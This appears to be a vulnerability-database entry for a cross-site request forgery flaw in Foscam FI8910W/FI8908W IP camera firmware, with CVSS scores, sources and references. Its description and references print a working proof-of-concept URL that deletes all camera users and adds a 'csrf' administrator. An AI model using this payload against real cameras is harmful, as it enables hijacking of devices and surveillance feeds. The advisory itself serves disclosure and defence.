VAR-201304-0570
Vulnerability from variot - Updated: 2022-05-17 01:57Foscam is a webcam video recording device. Foscam has a cross-site request forgery vulnerability that allows an attacker to execute arbitrary commands on an affected browser. Embedded Web interface version 2.4.10.3 and older of Foscam FI8910W, FI8908W and many others is vulnerable to CSRF attacks. This allows attacker to perform calls to any CGI API using cached basic server authentication data stored in victims browser. Details: For example, the following URL requested by victims browser would wipe all user records and add 'csrf' user with administrator privileges: http://cameraurl/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
The CGI API manual for mentioned cameras is available at http://www.foscam.es/descarga/ipcam_cgi_sdk.pdf
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "fi8910w",
"scope": null,
"trust": 0.6,
"vendor": "foscam",
"version": null
},
{
"_id": null,
"model": "fi8908w",
"scope": null,
"trust": 0.6,
"vendor": "foscam",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
}
]
},
"credits": {
"_id": null,
"data": "shekyan",
"sources": [
{
"db": "PACKETSTORM",
"id": "121177"
}
],
"trust": 0.1
},
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2013-02879",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-02879",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
}
]
},
"description": {
"_id": null,
"data": "Foscam is a webcam video recording device. Foscam has a cross-site request forgery vulnerability that allows an attacker to execute arbitrary commands on an affected browser. Embedded Web interface version 2.4.10.3 and older of Foscam FI8910W, FI8908W and many others is vulnerable to CSRF attacks. \nThis allows attacker to perform calls to any CGI API using cached basic server authentication data stored in victims browser. \nDetails:\nFor example, the following URL requested by victims browser would wipe all user records and add \u0027csrf\u0027 user with administrator privileges:\nhttp://cameraurl/set_users.cgi?user1=\u0026pwd1=\u0026pri1=2\u0026user2=\u0026pwd2=\u0026pri2=\u0026user3=\u0026pwd3=\u0026pri3=\u0026user4=\u0026pwd4=\u0026pri4=\u0026user5=\u0026pwd5=\u0026pri5=\u0026user6=\u0026pwd6=\u0026pri6=\u0026user7=\u0026pwd7=\u0026pri7=\u0026user8=csrf\u0026pwd8=csrf\u0026pri8=2\u0026next_url=\n\nThe CGI API manual for mentioned cameras is available at http://www.foscam.es/descarga/ipcam_cgi_sdk.pdf ",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
},
{
"db": "PACKETSTORM",
"id": "121177"
}
],
"trust": 0.63
},
"external_ids": {
"_id": null,
"data": [
{
"db": "PACKETSTORM",
"id": "121177",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-02879",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
},
{
"db": "PACKETSTORM",
"id": "121177"
}
]
},
"id": "VAR-201304-0570",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
}
],
"trust": 1.4333333499999998
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
}
]
},
"last_update_date": "2022-05-17T01:57:50.830000Z",
"references": {
"_id": null,
"data": [
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/121177/foscam-cross-site-request-forgery.html"
},
{
"trust": 0.1,
"url": "http://www.foscam.es/descarga/ipcam_cgi_sdk.pdf"
},
{
"trust": 0.1,
"url": "http://cameraurl/set_users.cgi?user1=\u0026pwd1=\u0026pri1=2\u0026user2=\u0026pwd2=\u0026pri2=\u0026user3=\u0026pwd3=\u0026pri3=\u0026user4=\u0026pwd4=\u0026pri4=\u0026user5=\u0026pwd5=\u0026pri5=\u0026user6=\u0026pwd6=\u0026pri6=\u0026user7=\u0026pwd7=\u0026pri7=\u0026user8=csrf\u0026pwd8=csrf\u0026pri8=2\u0026next_url="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
},
{
"db": "PACKETSTORM",
"id": "121177"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-02879",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "121177",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2013-04-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-02879",
"ident": null
},
{
"date": "2013-04-09T03:54:49",
"db": "PACKETSTORM",
"id": "121177",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2013-05-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-02879",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Foscam Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02879"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "csrf",
"sources": [
{
"db": "PACKETSTORM",
"id": "121177"
}
],
"trust": 0.1
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…